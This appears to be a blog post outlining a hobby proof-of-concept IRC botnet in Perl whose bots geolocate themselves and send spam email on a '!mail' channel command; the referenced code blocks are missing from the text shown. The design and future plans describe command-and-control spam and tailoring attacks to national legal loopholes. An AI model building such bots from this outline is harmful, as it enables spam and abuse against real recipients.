knutee

Lately, I’ve been looking into botnets and how they work. The idea of controlling an army of computers is both intriguing and scary at the same time. The basic idea is a number of slave computers that receive orders from a centralized server and carry out instructions. However, I wanted to see if these bots and the server could be aware of geographical location, and then utilize this knowledge to adapt the orders given out. This could be altering the choice of from_address, smtp_server and adapt the type of attack/spam according to loopholes in that countries laws.

Now, I expect this function to already be implemented in most modern bots, but since I’m a curious person, I wanted to make my own proof-of-concept botnet. Due to both ethical and legal issues, I needed to keep the bots at an experimental level, thats is; unable to spread themselves or accidentally cause harm. I do not wish to create a real botnet, just create a dummy version for learning purposes. Due to this I will be writing the code in PERL and only show portions of the code here. I’m also working on a version written in C, but I’m keeping that to myself for now.

First off I needed to make a basic outline for my system. I want a server sitting in an IRC channel passing commands to bots that join the channel. These bots log into the channel with names based on location, present them selves with IP and country, read chat for commands and performs e-mail spam on command.

Client

As described before, the clients job is to log on to a IRC server, join a channel and perform actions based on commands. For my example, e-mail spam will do. In it’s current state a lot of the parameters is hardcoded as I do not need the full flexibility to prove the concept.

Most of the includes speak for themselves. First off, we need to aquire the clients location. This is done with the Geo::IPfree module.

Secondly, we need to fill in some parameters for both the mail handling and IRC connection. I’ve chosen to randomly generate a number behind the bots name and location for this example.

After this is done you need to give the bot instructions on how to connect to a server and channel, and add default action when logging on if needed (like aquireing a new name from the server bot). Finishes with listening for MOTD to confirm that we are connected. This code has been excluded from the example.

Further on, we need to make the bot listen for events in the IRC channel. The easiest way is to listen for a text string that starts with a pre-defined word, and then look for a specific string of parameters needed for the “spam event”. This is called sub on_public. For my example I look for this string:

What this means is that I’m looking for a string similar to; !mail victim@victimdomain.com $header_text $body_text. The client will read these parameters into variables that can be used for the e-mail portion of the code. Using the MIME::Lite module, we can easily send mails with the following code:

And thats it for the client part really. Add the remaining needed code, and this bot will log onto your IRC channel and await spam instructions. To verify that it works, the command string can be entered manually in the IRC channel.

Server

Since the server is a work in progress, the code will be presented later

Future

• Add more functions to the clients
• Clients acquire new name from server
• Channel selection based on nationality
• Server !mail message will contain mail_from and smtp_server
• Add a database to the server to sort client location and jobs
• Add rule set for different countries